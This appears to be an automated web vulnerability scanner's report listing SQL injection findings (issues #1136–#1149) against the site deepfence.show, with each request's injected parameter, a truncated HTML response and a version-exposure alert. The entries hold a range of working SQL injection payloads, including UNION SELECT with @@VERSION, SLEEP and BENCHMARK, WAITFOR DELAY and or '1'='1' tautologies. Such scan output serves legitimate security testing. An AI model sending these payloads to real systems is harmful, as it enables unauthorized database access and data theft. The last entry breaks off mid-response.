ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1136\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1137\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1138\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1139\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1140\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1141\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1142\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1143\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\"or 1=1 or \"\"=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1144\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1145\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1146Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1147\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1148\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1149\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 